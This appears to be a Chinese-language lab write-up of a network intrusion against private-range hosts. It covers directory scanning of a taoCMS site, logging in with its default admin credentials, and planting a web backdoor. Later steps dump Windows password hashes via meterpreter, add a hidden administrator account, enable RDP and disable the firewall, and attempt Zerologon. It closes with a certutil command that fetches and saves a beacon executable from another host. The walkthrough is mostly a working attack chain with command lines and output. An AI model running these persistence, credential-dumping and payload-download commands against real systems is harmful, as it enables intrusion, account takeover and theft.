CMS #
fscan扫描到3590端口运行了taoCMS
[root@Hacking] /home/kali/lab3
❯ dirsearch -u http://192.168.10.10:3590/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.10.10:3590/
[04:11:00] Scanning:
[04:11:18] 301 - 240B - /ADMIN -> http://192.168.10.10:3590/ADMIN/
[04:11:18] 301 - 240B - /Admin -> http://192.168.10.10:3590/Admin/
[04:11:18] 301 - 240B - /admin -> http://192.168.10.10:3590/admin/
[04:11:18] 200 - 77B - /admin%20/
[04:11:18] 301 - 241B - /admin. -> http://192.168.10.10:3590/admin./
[04:11:19] 200 - 77B - /Admin/
[04:11:19] 200 - 77B - /admin/
[04:11:19] 200 - 66B - /admin/admin.php
[04:11:20] 200 - 77B - /admin/index.php
[04:11:32] 200 - 0B - /api.php
[04:11:37] 200 - 0B - /config.php
[04:11:38] 301 - 239B - /data -> http://192.168.10.10:3590/data/
[04:11:44] 200 - 894B - /favicon.ico
[04:11:50] 200 - 0B - /include/
[04:11:50] 301 - 242B - /include -> http://192.168.10.10:3590/include/
[04:11:50] 200 - 4KB - /index.php
[04:11:50] 200 - 4KB - /index.pHp
[04:11:50] 200 - 4KB - /index.php.
[04:11:51] 200 - 740B - /install.php
[04:11:51] 200 - 740B - /install.php?profile=default
[04:11:51] 404 - 0B - /index.php/login/
[04:11:53] 200 - 1KB - /LICENSE
[04:11:53] 200 - 1KB - /license
[04:12:04] 200 - 2KB - /README.MD
[04:12:04] 200 - 2KB - /README.md
[04:12:04] 200 - 2KB - /readme.md
[04:12:04] 200 - 2KB - /ReadMe.md
[04:12:04] 200 - 2KB - /Readme.md
[04:12:05] 200 - 977B - /rss.php
[04:12:11] 301 - 243B - /template -> http://192.168.10.10:3590/template/
Task Completed
尝试爆破密码失败,经过搜索得到默认的用户凭证:admin/tao,来到文件管理界面添加后门
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
apache:1002:aad3b435b51404eeaad3b435b51404ee:0047605c0f2b9342a96ff4502f0f1a84:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1003:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:809f928153e9cdf27a043a18028a6efd:::
web:1001:aad3b435b51404eeaad3b435b51404ee:a167976f7bd8d93ee232fa7a87a4079e:::
添加后门用户以及开启RDP
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
Backdoor #
注意到还有一个20网段
admin123,给蚁剑设置代理后,可以正常连接
CVE-2020-1472 #
尝试进行zerologon攻击,将计算机账户密码重置为空
certutil -urlcache -split -f http://192.168.20.20:8055/beacon_x64.exe beacon.exe
netsh firewall set opmode disable
最后全部上线
